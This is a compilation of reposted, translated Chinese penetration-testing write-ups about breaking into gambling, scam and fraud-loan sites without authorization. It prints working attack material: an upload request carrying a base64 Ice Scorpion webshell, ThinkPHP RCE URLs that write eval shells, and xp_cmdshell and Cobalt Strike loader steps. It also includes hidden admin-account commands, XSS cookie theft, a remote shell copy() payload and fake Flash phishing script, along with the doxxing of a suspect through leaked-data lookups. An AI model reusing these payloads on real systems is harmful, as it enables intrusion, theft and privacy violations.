UKhackteam

Foreword This article is for communication and learning only. Any direct or indirect consequences and losses caused by the dissemination and utilization of the information provided by this article shall be the responsibility of the user himself, and the author of the article shall not bear any responsibility for this. Penetration testing can be divided into three stages: information collection. Collect all relevant asset information as much as possible. Determine the scope of the test. Vulnerability discovery. Further vulnerability detection and exploitation of the collected assets. Further exploitation and degree of exploitation of the discovered vulnerabilities. 1. API interface in js 2. Multi-port site 3. Customer service system phishing guidance, etc.4. Points system targets fragile side stations 5. Recharge interface 6. Find source code analysis for a demo site leaked source code white box analysis 7. The bc backend is rooted in js resource url, subdomain, etc. and other methods to find general small sites, mostly add the first domain, ad ag admin 123admin ht, etc. Reprinted in the original link: https://mp.weixin.qq.com/s/ZGNKIkfOidLPpjT856LHxw

0x01 Vulnerability Description Network dubo refers to gambling activities conducted through Internet means (illegal dubo websites, spinach Apps, WeChat groups, etc.). Because the online dubo is illegal and the funds are not protected by law, there are many "scam-making" behaviors. Many people often dare not call the police after being cheated, resulting in the destruction of their families. Therefore, it is urgent to crack down on dubo. There is a vulnerability to upload any file in a certain spinach system. The attacker can upload Trojan files through the vulnerability, resulting in the server being lost. 0x02 vulnerability recurrence fofa: body='main.e5ee9b2df05fc2d310734b11cc8c911e.css' 1. Execute POC, upload the Ice Scorpion Horse, and return to the upload path POST //statics/admin/webuploader/0.1.5/server/preview.php HTTP/2Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User:1If-Modified-Since: Mon, 05 Sep 2022 01:19:50 GMTIf-None-Match: '63154eb6-273'Te: trailersContent-Type: application/x-www-form-urlencodedContent-Length: 746data:image/php;base64,PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IAoJJF9TRVNTSU9OWydrJ109JGtleTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnR zKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewog ICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBv c3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/Pg==s 2. Ice scorpion connects to get a webshell Ice Scorpion default connection password: rebeyond 3.nuclei batch verification script has been published on Knowledge Planet (there are many assets) nuclei.exe -t bocaijngj_upload.yaml -l subs.txt -stats Reprinted in the original link: https://mp.weixin.qq.com/s?__biz=MzkyMTMwNjU1Mg==mid=2247486261idx=1sn=2ea324e5b3b895bd500a509bd15ae90fchksm=c184dfe2f6f356f47a5f80d045fac890227a508488b23898482ce4f9daa91fecc54d2f83629scene=178cur_album_id=2581677939042598912#rd

I've been browsing on QQ space So the following is here. Open the site, it’s very considerate and you can enter the front and back office. Let's talk about the loopholes below SQL injection, there is a set of programs based on a template two-opening, which happens to be the one I have in my hand and have audited. So take it easily. No filtering, just make a note. I suspect that uploading this arbitrary file is the backdoor left by the developer. Those who can understand can see it at a glance. Just create a new form locally and submit it. However, there is a problem with the target site. The path is not echoed when uploading, so it should be commented on echo. Locally built tests, Modify the upload file name to this format. Idea: Reproduce the upload locally and submit it at the same time as the remote. At the same time point, the returned file name should be the same. Test Reappearance is successful. Click until it is. I would like to ask you guys who are proficient in php auditing Is this code useful? Trying various truncations can never execute php code. Reprinted from the original link: https://mp.weixin.qq.com/s/hduQd7Jm72b00oSU9Ip1BQ

0X00 According to the wrong end I accidentally encountered a set of garbage spinach website pig killing disk Accessing the scanned directories and files one by one does not help much, but the background address is found. phpmyadmin access 500. Visit xd.php to the background to access it to find that you also need to authorize the verification code I tried 8888, 123456 and other things all prompted errors and closed them on the spot. There is only one subdomain explosion attempt. Nothing was found in Nmap scans. Returning to the homepage, I found that url is a bit uncommon. 0X01 Looking for similar websites and source codes Such frauds rarely develop the source code. It is certain that the source code is downloaded from the Internet and found someone to build it. Uncommon is the feature, so I searched it. 0X02 Start audit The source code of so many websites must be a mess, so I spent some time finding the source code and trying to audit it. Download the source code and scan it with seay. The source code is too big and I am too lazy to build it locally. I directly use the source code to criticize the target. I found a fileupload.php file from it and it seems to be a bit problematic. The access target discovers that the file also exists. Extract the file and test it in a locally built environment. Direct access will automatically create two folders upload and upload_tmp. This thing is a demo point. This point actually looks more like a backdoor. And the filename variable is completely controllable. Continue to read down and find some judgments. You can upload the name of the form to file. If you upload the file, don’t worry about other files, just change the upload form. Just add the parameters name and file. Name parameter controls upload file name aaa.php Select 1.jpg upload There is no return path after upload, but the aaa.php file already exists under upload. SQL Injection The value of where in the variable comes from the request, and there is no value of type detected in the checkinput above. Follow betListCnt It is directly brought into the query without any processing, and there are many similar points. 0X03 Verification of audited vulnerabilities Get the webshell through the previous upload and try to increase the rights. It was found to be debian. I found that there is port 6379 but not started by root user After looking at the kernel version, I feel it should be OK, so I try to find exp with permissions. Generate msf horse For the convenience, I used msf to launch this machine. Then look for the corresponding escalation exp. 0X04 Try to raise rights Found these two CVE-2019-13272 and CVE-2017-16995 When I was looking for the utilization tool on github, I remembered that msf actually comes with the right-to-rights. So I tried to search Use it if you search The result failed on the spot Try the second CVE-2017-16995 successfully returned a session with root permissions. The privilege escalation was completed and reproduced in the original link: https://mp.weixin.qq.com/s/Yh0qq5imlfHhNQnbtPfxcA

1. Case 1 Because I was beaten by a cheater recently, I am planning to let those cheaters understand what autism means. Last night, I climbed nearly 1,000 platforms selling chicken-eating plug-ins You guys who sell cheats will hit you one by one when I have time. I found that most of them use an Aspx program, but unfortunately, you cannot audit white box without source code, and you can't find any holes in the black box. I can only find soft persimmons to pinch them, and I hammered four of them in one breath last night There are basically pagodas However, the php-venom 4 series and the supporting encoder have become more stable than the pagoda I took off my pants and found that there were 4000+ data inside Another chicken-eating plug-in station was hit tonight Unfortunately, the embarrassing is that there is no write permission Write a big hydrological record 1. No routine to enter the backstage This should be considered a promotional site, there is nothing in it, only promotional content No matter what you are, just do it. I took a look at it. It was the second development site of Dreamweaver It's easy to enter the backstage, and everyone understands what it means here. 2. Metaphysical Backend I found that the backend deleted many functions, especially the Dreamweaver File Manager But from a empirical perspective, many of these secondary developments do not really delete the editor, but they are not displayed on the background page. Review element start Just find a link to change it and replace it with media_main.php?dopost=filemanager Then clicked, and found the file manager page Upload shell I thought it would end like this It turned out that although the upload was successful, there was nothing I thought it was waf, so I changed to a harmless jpg that was not bad enough to go on it. I think it's a directory permission issue Find the temporary file of session and upload it, but it still won't work. I won't put the picture, but I can't pass it on. I think it may be that the entire site has no permission to write Try the deletion function and find that you can delete files emmmmm, so do you have permission? Generally speaking, if you don't have write permissions, there will be no modification permissions, that is, there is no delete permissions. Thinking about whether the upload function is broken, change the method to getshell 3. The first thing that comes to mind when failing geshell is to modify the file and put a shell in it Showing csrf token is wrong How to solve it after searching I found that I changed the check function directly, and added return in the first sentence As a result, this error also popped up when modifying the config.php file So I fell into a dead cycle. Changing the tag is the same error. Then I tried each 0day of Dreamweaving and executed the background code at will. The prompt execution was successful, but either the 404 page or the csrf token reported an error Why does CSSRF token detection always fail? I have never encountered such a problem before. Is it because I was wrong? If my cousin knows why, please tell me thank you 4. Successfully gotshll originally thought about it, and then went out to have a meal. Then I wondered if there would be someone else’s backdoor since it was a weak password. I remember that Dreamweaver has its own backdoor detection and killing function For the same review element, find the backdoor check function and start scanning Sure enough, suspicious files were found Then I saw that it was all the other people's back doors Find any one and connect it 5. Finally, I found that it was an off-star host and the entire site did not have write permissions, so no wonder it could not be uploaded. After flipping through the directory, you cannot cross-site, you do not have write permissions, you cannot bypass disable function It's like there's nothing. But the magic is that you can delete any file I won't delete the site, save the evidence 2. Case 2 First, open the website and we can see its cool interface Heartwarming announcement Shameless propaganda words 1. Discovery Injection Based on tp3 development, background/admin Try a universal password Prompt password error Try admin admin888 and prompt that the account does not exist The two echo differently, considering that there may be injection 2. Cannot use burp to catch packets and send them to repeater for further testing Return status: -2 when the condition is found to be true, return status: -1 when the condition is false Further confirmation of the conjecture, the background injection exists Throw it to sqlmap to run Injection cannot be detected, prompting a bunch of 404 not found At first I thought it was CDN blocking SQLmap traffic, but later I found that there was no protection at all. Fake cdn So consider that it might be that cms filtered something 3. Bypass the filtering and after testing, it will be returned 404 as long as angle brackets appear. You can use between to bypass At this time, continue to display back and forth according to the condition true=-2 condition false=-1 The blind spot condition is met Suddenly I thought this situation was the same as the injected question in the fifth space final. True returns to one page, false returns to another page, filtered characters appear and return to other pages, and use between to bypass CTF is sincere and doesn't deceive me So just add --tamper=between to the sqlmap parameters 4. Last The AES encryption used by the administrator password in the database is without a secret key and cannot be decrypted. The login port of ordinary users is closed, and they cannot register or log in. There is no use except for the information about orphans to escape. Pack up the evidence and submit it to the relevant departments Reprinted from the original link: https://mp.weixin.qq.com/s/Bms1EPvpb1S7sU2KQX8ctA

We found a background with a QP background framework with vulnerabilities There are many loopholes in this framework, such as user traversal. If we enter an existing user, if the password is incorrect, it will prompt the user or password if the password is incorrect. If we enter an non-existent user, it will prompt the user not exists. In addition, there will be SQL injection vulnerabilities on the website. We only need to grab a POST package to submit the account password. Paste a txt document and throw it into SQLmap. It is mssql, we can enable xp_cmdshell, here we plan to write to webshell, so first os-shell determines the path (super slow) Then use xp_cmdshell to write to webshell was successfully launched Then I planned to go online to cs for the next operation, and tried web delivery, but was stopped by Killer It's very annoying, there's no way, I can only try to go online without killing. The method I use here is to separate without killing. Generate payload, then write a shellloader and compile it at base64. I put shellcode on vps Upload shellloader to target One, two, three are online! That's right, the low-powered user did not succeed in trying to escalate power many times, but in the end sweetpotato won it Get my favorite system Add a user net user admin$ admin@123 /add to add to the administrator group net localgroup administrators test /add direct 3389 connection I originally planned to scan the remote desktop with FScan, but I found that the IP of the intranet is different from usual. After scanning, I found that many hosts appeared, so I judged that this was a VPS, so I penetrated it until it was. Reprinted from the original link: https://mp.weixin.qq.com/s/ch3zcIlUPpZ8tjCJttwarQ

Recently, I accidentally discovered a virtual currency buying a pig-killing plate, so I conducted a wave of tests, and the former director was like this. It is entered with RCE for thinkphp5.0.5 and successfully written to the webshell. s=index|think\app/invokefunctionfunction=call_user_func_arrayvars[0]=assertvars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7)) Check the phpinfo information and found that all functions that can execute system commands have been disabled, and neither com nor dl loading can be used to execute corresponding system commands. The following is shown: assert, system, passthru, exec, pcntl_exec, shell_exec, popen, proc_open//php system commands are all disabled However, the read and write permissions of files do not disable functions such as assert(), file_put_contents(), etc. After checking, it was found that it was the following as shown in the Windows system: Since all functions that php execute system commands are disabled, it is very uncomfortable to be unable to execute system commands. After downloading his website source code, I read it briefly and found that his administrator cookies are fixed and can be forged as follows, looking like the backdoor: Therefore, you can log in to bypass the background, and the administrator cookie is fixed. Add the cookie field to log in to bypass it. Browser f12, add the above key value to the cookie to access the index, and you can successfully log in in the background as shown below, so you can make a lot of money (many people are cheated): The front desk asked the customer service and learned about the transfer account (the operation method of the pig killing disk is that after the user transfers the money into the account provided by the customer service, the user then rushes the corresponding value of funds in his account to the background for review. After the review, he can use the value of money to invest and trade in currency) and leave it as evidence to submit: Since the system commands were not executed before, if you want to break through, you start flipping through the files on his server. After flipping through the system files, you will find that the pagoda folder exists. The detection found that the pagoda service is indeed open, but the default login port has been modified, as shown below: Looking through the pagoda file, you will find the file name admin_path.pl of the storage path, as shown below: Found the Pagoda login portal and successfully accessed the login portal, as shown below: Continue to search and find a default.pl file, which stores the corresponding login password: After getting the password, I tried the default username and found that it was wrong and could not log in. Continue to flip through the file default.db file to record the login record. Find the login account: Use the account password to successfully log in to the pagoda management backend, as shown below: Use the account password to successfully log in to the pagoda management backend, as shown below: Find the scheduled task to modify the planned task and execute the online horse of the CS. After the online task is launched, change the planned task back to the following: The CS was successfully launched as follows: Check that IP only has a public address but no intranet, and there are several other devices deployed in the same C segment and are all the same set of things, so I won’t go down: It's all in this way, nothing tastes boring Reprinted in the original link: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247486570idx=1sn=0c20fbbf4adbeb5b555164438b3197f7chksm=ce67a6f3f9102fe51b76482cd7d6bb644631ae469d8c1802956034077137ecd49ea56c8d2b1fscene=21#wechat_redirect https://xz.aliyun.com/t/8224

0x00 Overview One day, an online friend told the author that he was cheated. The way to be cheated is unique. Because I have no money, I choose to take a loan and was tragically scammed during the loan process. Scam text messages 0x01 fraud process (The victim here is replaced by Xiaohui) One day, Xiaohui received a text message about online loans on his mobile phone. It happened to be the end of the month and was in a tight position. Xiaohui couldn't help but temptation to download and open the app. After registering a good account, filling in your ID number, handheld, work location, family information, etc. I applied for a loan of 20,000 yuan, but it has not been received for a long time. Xiaohui asked the customer service and learned: Dear, you need to pay a VIP fee of 688 first to apply for a loan. After payment, the VIP fee will be transferred to your bank card account together with the loan amount. Xiaohui thought about it and didn't lose money, so he opened VIP treatment for the rent next month. Xiaohui has opened VIP treatment and thought he would be able to get a loan through the end of the month, but he still did not receive the loan amount and VIP fees. This time, the customer service took the initiative to contact Xiaohui, 'Your credit limit is not enough, you need to swipe another 3,500 yuan in cash. Please pay cash to prove your repayment ability. After payment, the fee will be transferred to your bank card account together with the loan amount'. Xiaohui was anxious. Seeing that the rent was gone next month, he gritted his teeth and borrowed 3,500 yuan from a friend and called the bank card number provided by the customer service again. He thought, you have no excuses this time! 20,000 yuan, bring it to you! Xiaohui has already thought about how to eat, drink and have fun after a loan of 20,000 yuan~~ However, the goddess of luck still did not take care of Xiaohui. The customer service contacted Xiaohui again and said that the approval had been successfully approved and the payment was about to be paid, but the cost was still 3,000 yuan, and the expenses would be transferred to the bank card account together with the loan amount. Xiaohui was stunned. Then, the customer service sent the fake contract generated by the background to Xiaohui. Xiaohui was anxious and just took a loan, but he lost several thousand yuan and had to go to the credit report. The key loan has not been obtained yet! Seeing that the matter was getting worse and worse, Xiaohui found me. After Xiaohui's description, I checked the loan software on Xiaohui's mobile phone and told Xiaohui helplessly that you have been cheated and the money will not be returned. Xiaohui was also stunned at this moment, shed tears of regret. ps: The above is only the real process of fraud, and all the narrations in detail add to the fire of me. The author also briefly analyzed and recorded the two common source codes of fraud on the market. 0x02 Vulnerability Analysis 1. The first set of source code vulnerability analysis (1) Thinkphp log leak Based on Thinkphp3.2.3 development, front-end and back-end separation Debug is enabled by default, causing leaked log SQL information, and exception cache Construct Payload: App/Runtime/Logs/21_10_16.log Get the leaked admin table account password and enter the background (2) The array is controllable, causing the RCE uploadable file name to be directly brought into the data packet Here it is guessed that the backend controls the file name in an array (it also proves that this conjecture is correct after getting the webshell) Add the uploadable file name to php, and then upload it to get the Webshell Check the corresponding configuration file and find that the uploadable suffix name is in the array. Here you can also use inserting a closed array to getshell payload: siteName=11111').phpinfo();// Let's see how the backend handles it, because of the return array, the string concatenator '.' must be added Log in to the background to check whether Payload is executed 2. Second set of source code vulnerability analysis (1) Customer Service Office Websocket-XSS Author has limited capabilities. The second set of fraudulent loan source code is suspected to be built with one click. They all use the latest version of Baota + Baota free version WAF, which is insufficient in obtaining permissions, so they look for breakthrough points from the customer service office. Front desk Find the customer service entrance, upload the image, and you will be transferred to the data package uploaded through the websocket Modify websocket packets and construct XSS Cookie Get 3. Customer service system control/PC control 3.1 Control database Log in to mysql database to view fraud suspect login IP The dynamic IP of the telecom base station in Hangzhou is judged to be a home route and has no traceability value yet. 0x03 Control customer service system The first set of fraud source code customer service system uses the online online customer service system I flipped into the background login address of the customer service in the background. The front-end showed that the account had an error in password, but the account was not successfully exploded. Then the author registered the customer service system himself, traversed SetCookies through adminid and uid, and successfully exceeded his authority and obtained the customer service account. Chinese account== Get password for blasting Log in to the customer service background The entire fraudulent tactic chain Chat history with victims 0x04 Use flash fishing After controlling the server permissions of the fraud app, the author used flash phishing to try to control the personal PC of the fraud gang. The file that jumps after successful login in the background is inserted and jumps to the pre-prepared fake flash update page Prepare in advance: A fake flash domain name without killing horse (preferably containing the word 'flash') scriptwindow.alert=function(name){var iframe=document.createElement('IFRAME');iframe.style.display='none';iframe.setAttribute('src', 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert('Your FLASH version is too low, please try to upgrade and access the page after changing it!');window.location.href='https://www.flashxxxx.com';/script effect: Enter your account password and log in. At this time, load the above JavaScript. Click 'Confirm' to jump to the pre-fabricated flash update page website to induce download clicks. But it was not launched in the end. Through the log, it was found that the fraud gang logged into the backend, which is a small regret. 0x05 Summary A typical feature of online loan fraud cases is that the suspect recruits victims who need loans under the gimmick of "no mortgage and no review", and collects a deposit in the name of "account freezing and unfreezing" to complete loans, and then charges again in the name of insurance premiums, activation fees, service fees, etc. In order to recover the money paid previously, the victim can only complete the transfer according to the entire process designed by the suspect for the victim, resulting in the victim's money being cheated. Some self-employed individuals who urgently need money, office workers with advanced consumption concepts, college students and other groups are vulnerable to fraud. The scammers not only extend their sinful hands to Hong Kong, Taiwan, or even abroad. According to analysis, this group of fraud gangs also committed the same fraudulent method in Brazil, and the fraud source code used is the first set of source codes analyzed above. More than 500 victims in Brazil. The net of heaven is vast and sparse without leaking! All those who commit evil will be severely punished by law! Reprinted in the original link: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247502166idx=1sn=3fe78999b5b43a059e66975dd185b3ccchksm=ce6463cff913ead9c3a448d7466b7c38ed593a709918265283387ad4bb787292bdd2979e7d64scene=21#wechat_redirecthttps://xz.aliyun.com/t/10391

0x00 Introduction With the raging of illegal spinach sites, countless wives and children have been separated. To this end, I have contributed a meager effort, hoping to provide some help to the "relevant departments". What I will perform for you today is Harvest BC Tianheng Shengda. The 0x01 Program Introduction program adopts PHP5.4 + MySQL program structure is as follows Basically, the criminals who currently do such illegal sites have modified several sets of program models in addition to outsourcing. For the time being, due to technical level issues, Tianheng can only be issued. The version may be a bit old. However, a large part of it is used. According to an actual test by a netizen who did not want to disclose his name in mid-April, about 70% of these problems existed, while illegal sites using this program collected about 5,000 to 20,000 yuan in half an hour. 0x02 Vulnerability Details 1. money - SQL injection web\wjaction\default\PayOnlineBack.class.php Continue to follow up with money, here is GET to obtain, and then look at the conditions Condition display, the first one is Key verification, this one is in the configuration file. If the Key is wrong, it means that all orders cannot take effect. In other words, the Key is definitely within the URL request, and this verification can be bypassed. Continue to look at the conditions, here is to generate an MD5 value for verification. However, this verification is flawed, and the value of the key is not brought into it here. So when we submit directly, set $tno.$payno.$money to empty. Then we will get the MD5 value of $md5key. Because $sign can be displayed in the URL. After decryption, we can write scripts and inject them according to its verification mechanism. Keep reading down, just randomly come. Keep reading, the last verification. The username here must be real, so the verification here is considered to be invalid. Next, according to the previous analysis, you can inject it. The most important point is to guess the value of md5Key. 2. Order information - Storage XSS Order information - Username Where the default payment submits the form, the front desk and backend are not filtered and cause XSS storage vulnerabilities. 3. No verification in the background - Getshell lib/classes/googleChart/markers/GoogleChartMapMarker.php A random code execution vulnerability, Google variables get data through GET and then execute it. I won’t write the code part for relatively low-level problems. (This vulnerability is not efficient, about 30% chance) 0x03 Summary This set of source code is not just these few holes, you can practice digging it yourself. Secondly, I originally thought of releasing and collecting illegal site tools that did not include them, but later I thought about it to avoid letting "other" security personnel go astray, which eliminates this idea. I still have a hydrology article, I hope you all have more advice! Reprinted from the original link: https://mp.weixin.qq.com/s/7R3OrGPmUesDz4YKuxoJjw

1. Directory structure First, let’s take a look at the structure. There are related codes in the system folder. I'll show you the loopholes directly. 2. Audit holes 1. Shopping cart gets information asynchronously - SQL injection system\modules\member\cart.action.php Although it filters single quotes, it is not protected by single quotes here, so it is an injection here, and the user identity is not verified. The injection can be performed without logging in outside the site. Direct official website hahahaha! 2. BOM plug-in-directory system/plugin/bom/bom.plugin.php Just access it directly. Even if the background is changed, there is nothing wrong with it. It’s still just right! 3. My order-storage XSS (can call administrator cookies) Since this set of CMS came out earlier, many Xiaohei have discovered XSS vulnerabilities before, but. My XSS seems to be 0day. Hahaha, I need to post the order function. Here I will demonstrate the process of going through it first. Add pictures Change the image address to our XSS statement fileurl_tmp parameter At this time, the IMG tag is closed and 1 pops up (triggers the "Show order view" managed in the background) 4. Upload configuration-backend Getshell Some people may see that there are uploads in the background, but in fact, these uploads cannot be used. Although you can change the formatting of the whitelist in the background, you still can't mention it. At this time.just get involved! ~~ Since it filters single quotes, there are no single quotes here. Write pyload at the allowed upload type It's done after submitting~~ Write a remote horse through the copy function 5. There are defects in the background verification code The default account admin This string of MD5 values is the corresponding verification code value, and the interface can be called here for blasting. It's also a small flaw 6. Combination punch Getshell-CSRF+XSS We directly use XSS to nest an html page, and then simulate all operations. It's done. Starting from modifying the upload format and inserting the horse to simulate access [/index.php/admin/setting/upload?c=copy('http://www.xxx.com/shell.txt','./inc.php'); Just hit some columns and get it done. If you really don’t worry, add an administrator in the end. This set of CMS does not filter CSRF attacks, and I don’t take a screenshot. My cousins’ postures are more sexy than me. Wow, hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha Reprinted from the original link: https://mp.weixin.qq.com/s/8OTU9yQ3pxj6k2QpbEzNRA

When looking for TSRC assets in the Eagle Picture, when I was preparing to dig Tencent SRC, I saw the domain name of this site :qq.com.xxxx.top, the title is login The first feeling is that it is not a serious site, it should be found by the fishing station whois.webpack package . This kind of site basically has some test accounts. I tried 18888888888888888 password 123456 . I saw this. This is the kind of people who earn commissions when doing tasks. The main feature is to cheat money. F12 searches for requests and js, the loaded resource file reports an error, use thinkphp but there is no hole, the IP is really available, and the background is disguised, called xxx check-in system Find other assets through fofa, the IP access is a template page for enterprise website building, add admin behind the IP and jump to the background of enterprise website building, tell the truth that this is really bad Enter the home /x again in thinkphp5.0.5, verified that there is RCE, the site that does tasks and earns commissions, has not yet carefully tested it and collected information, and found the side station and entered it. Basically, the database configuration is in data or config md5 decrypts the administrator password, enter the background to see other information and don’t pay much attention to it, mainly looking for site administrators 1. Sensitive mobile phone number is often passed through the recommendation number, which is a mobile phone number. 139xxxx2. Administrator log analysis : suspicious IP positioning is in Sichuan 3. Check WeChat through the mobile phone number and Alipay to find this person 4. Check this person through the social work library QQ, Weibo and his own photos Reprinted from the original link: https://mp.weixin.qq.com/s/9M0HEP1x-5Xt1JQeyVDrGA

0x01 thinkadmin historical vulnerability review The background address of the other party's app has been found to be thinkadmin, so we need to review the historical loopholes of thinkadmin. CVE-2020-25540 https://github.com/zoujingli/ThinkAdmin/issues/244 Use POC as follows https://github.com/Schira4396/CVE-2020-25540 Column Directory POST /?s=admin/api.Update/noderules=['runtime/'] file read /?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b363932382x312t1b The essence is probably to design a function that allows third parties to compare system web files on the server. As a result, any directory is read due to directory traversal. Although there are certain restrictions, the harm is still very, very great, so this function will be removed from the shelves after subsequent updates. There is also a deserialization vulnerability without CVE https://github.com/zoujingli/ThinkAdmin/issues/238 There are two interfaces, one of which is the rule parameter of the directory function listed above. POST /?s=admin/api.Update/noderules=payload The other place is POST /?s=wechat/api.Push/indexreceive=payload 0x02 First source code Because the official no longer provides downloads of the old version of the source code, I immediately went to another place to find an old version of the source code using thinkphp5.1.38. After detection, it has the following vulnerabilities. application/wechat/controller/api/Push.php Only one of the two deserializations was fixed. application/admin/controller/api/Update.php The routes for reading column directories and any files have changed slightly, and the column directories cannot be controlled by passing rules parameters, so they can only list the web root directory. But arbitrary file reading removes various restrictions, which means you can directly read config/database.php to get the database configuration. After obtaining the database configuration, if the database can be connected externally, it can be used more deeply. application/admin/controller/api/Plugs.php This is the file upload interface that thinkadmin comes with. Just like many cms designed, its whitelist storage_local_exts can be configured in the database or system background. Normally, we can use this to perform getshell operations, but it is obvious that if we directly add php to the whitelist, we will not be able to pass the fourth if, and there will also be intercepts in the system configuration in the background. application/admin/controller/Config.php If we operate the database directly, we can bypass the background configuration restrictions, but cannot bypass the upload() restrictions. Obviously, filtering php is not enough. If the other party is a windows server, we still have php:$DATA optional. If the other party is apache and has made the wrong configuration, we also have possible parsing suffixes such as php3/php4/php5/php7/pht/pht/phtml/phar. 0x03 Second source code However, the first source code has no use except being familiar with the thinkadmin architecture. Because the target is thinkphp6.0.3, and the vulnerability is different from the first one, there is no deserialization. However, there are still column directories and file readings, and they are exactly the same as historical vulnerabilities. app/admin/controller/api/Update.php But when listing directories, I encountered a problem. This is because I'm listing the web root directory. If the other party's project is huge, or a folder does not have permission, it will cause an error. At this time, you need to list the directory in a targeted manner, mainly ./app and ./runtime. Read ./app to get the controller path. In the original thinkadmin, there are not many breakthroughs, but many of these programs are opened in the second place. Compared with the controllers that do not have in the original thinkadmin, you may directly audit the vulnerabilities. Audit vulnerabilities need to be read with any file. Please review the previous one for details. In short, with CVE-2020-25540 we are equivalent to obtaining its source code. This program is easy to find a SQL injection. /app/admin/controller/api/Main.php However, after I invoked the password, I found that login required OTP verification, so I could not continue the audit. /app/admin/controller/Posting.php Very stupid command splicing, there are three places in the same location, but all require background permissions. In the end, it was found that exec() was disabled_functions, so it cannot be used. /app/admin/controller/api/Upload.php The last place was discovered by a friend’s reminder. At first glance, isn’t this a upload brought by thinkadmin? I have analyzed before that a specific environment is needed to utilize it, so I skipped it directly. As a result, there is an extra xkey parameter that can completely control $this-name. It is hard not to suspect that this is a backdoor. In the end, getshell is like this. But this upload interface also requires background permissions, what should I do? At this time, it is the turn of thinkphp, which is often used by ./runtime, to appear. Reading the file runtime/admin/log/single_error.log is easy to find that it records a series of session errors. And we can know that this program uses the original php session, and it is not placed in /tmp or /var/lib/php/sessions/, but runtime/session. That's simple. We directly use the column directory to list all sessions and then blast them. In this way, you can directly enter the background and bypass the OTP limit. Then use its xkey backdoor getshell. 0x04 Alternative mind What if there is no back door? This system is linux+nginx, and it cannot bypass the original upload limit of thinkadmin. But in the subsequent code audit, I found that it has a graph bed server. This getshell server (A) can access an interface of the graph bed server (B) with the file_paths parameter. The purpose is to allow server B to download the pictures on server A in turn and backup them. Why do I know this? Because Server B is even more riddled with holes, you will find out by directly accessing this interface. Not only does the source code leak because of debug, but the splicing of this command is too naked, and it can even be used as a shell. Therefore, we can completely take down Server B directly through arbitrary file reading and code audit without taking down Server A. What's the use of getting server B? Server A will use curl to request Server B. In this case, you can tamper with the code of Server B, change the interface to 302 and jump, and then modify the protocol to gopher, and you can hit the local port of Server A. If the FPM 9000 port and the 6379 port of Redis are present locally on Server A, SSRF getshell can be performed in this way. This case can often be exploited in the SSRF vulnerability of Discuz. Although there is no 9000 fpm this time, there is redis. The redis key and port are also stored in config/cache.php, and the web directory happens to have 777 permissions, which fully meets the conditions for gopher to hit local redis. Of course, I didn't try it in the end, but there was no problem in theory. Reprinted from the original link: https://mp.weixin.qq.com/s/BuHJuQh3lyaq1SmY2xKl3g

A senior was unfortunately cheated of some funds on a phishing website a few days ago. Before contacting the relevant departments, he found me to see if he could obtain some useful information to facilitate the actions of the relevant departments. After collecting preliminary information on the website, I found that the website uses the ThinkPHP 5.0.7 framework, and directly find the corresponding version of Exp of ThinkPHP and try: http://www.hu*****.***/index.php?s=/index/\think\app/invokefunctionfunction=phpinfovars[0]=1 //Execute phpinfo phpinfo was successfully popped up, and the RCE vulnerability of ThinkPHP was not fixed. It can be seen through phpinfo that the server is built using a pagoda and runs the Windows system. I thought that the next thing was very simple, but I encountered difficulties when I wrote the shell: http://www.hu****.***/index.php?s=/index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=file_put_contentsvars[1][]=ye.phpvars[1][]=?php eval($_POST['cmd']); The file was successfully written, but it was directly output to the page. Check the source code and found that it was escaped as HTML entity encoding After trying to use base64 encoding and then write it, I found that it was still escaped, so I directly executed the command and tried it: http://www.hu****.***/index.php?s=/index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=dir I found that there was no echo, and I tried to rebound the shell but failed. At this time, I felt that the system might have been disabled, and I switched to eval and still failed. Finally, I found that it could be successfully executed using assert, so I directly constructed the shell connection: http://www.hu*****.***/index.php?s=/index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=assertvars[1][]=@eval($_POST[ye]) After 